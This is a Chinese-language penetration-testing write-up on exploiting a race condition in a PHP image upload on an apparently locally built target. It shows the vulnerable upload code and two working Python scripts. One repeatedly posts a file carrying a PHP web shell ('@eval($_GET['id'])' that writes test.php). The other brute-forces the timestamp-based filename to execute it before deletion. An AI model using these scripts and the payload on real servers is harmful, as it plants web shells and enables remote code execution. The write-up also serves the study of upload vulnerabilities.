實戰 | 記一次條件競爭文件上傳

一個文件上傳點,任意文件上傳,此處有源碼為本地搭建，首先上傳正常圖片,上傳返回都正常

修改后綴名為 php 頁面報出現報錯信息但也返回了地址

訪問發現只有個 png 頭，這里想到報錯信息里面也是一些圖片操作函數,進行了二次渲染

使用以下項目

https://github.com/gwjczwy/jpg_payload

生成一張圖片馬

上傳后訪問也是一樣

查看一下源碼,核心代碼,發現文件是先上傳然后在處理,在刪除原文件生成新文件

$extend = pathinfo($data['file']['name']);  
    $extend = '.'.strtolower($extend["extension"]);  
    date_default_timezone_set('PRC');
    $imgpath  = $data['img_dir'].'/'.date('Ymdhis', time()).rand(100, 999).'test'.$extend;
    $upload  = move_uploaded_file($data['file']['tmp_name'], $imgpath);
    $imgpath  ="../common/".$imgpath;
    
    if(!$upload){
        echo 'parent.alert("請嘗試重新上傳！");';exit;
    }else{
        .......
        針對文件處理的代碼
        .......
    }

這里的思路是利用程序去發包上傳,另一邊去訪問條件競爭從而繞過,這里用 burp 插件把圖片上傳包導出成 python requests 代碼,隨便寫了一下就沒有加多線程

import requests
try:
    url = "http://xxxxxxx/upload.php"
    cookies = {"PHPSESSID": "1gmkmeqdg9sl8i4crprkm25884"}
    headers = {"Cache-Control": "max-age=0", "Sec-Ch-Ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"", "Sec-Ch-Ua-Mobile": "?0", "Sec-Ch-Ua-Platform": "\"macOS\"", "Upgrade-Insecure-Requests": "1", "Origin": "", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarym1ogNWdW0fVSBGcm", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "iframe", "Referer": "", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9"}
    data = "------WebKitFormBoundarym1ogNWdW0fVSBGcm\rContent-Disposition: form-data; name=\"file\"; filename=\"babyshell.php\"\rContent-Type: image/jpeg\r\r@eval($_GET['id']);\rfile_put_contents('test.php', '');\r?>\r------WebKitFormBoundarym1ogNWdW0fVSBGcm--\r"
    while 1:
        requests.post(url, headers=headers, cookies=cookies, data=data)
except:
    pass

然后在寫一個程序去訪問

import requests,time,random
while 1:
    time1 = (time.strftime("%M%S", time.localtime()))
    path1 = '2022012405'+time1+str(random.randint(100,110))
    burp0_url = "http://xxxxxxxx/common/upload_img/"+path1+"test.php"
    re1 = requests.get(burp0_url)
    if(re1):
        print('okok')

最后幾十秒后訪問 test.php 文件發現生成成功

測試執行，也沒問題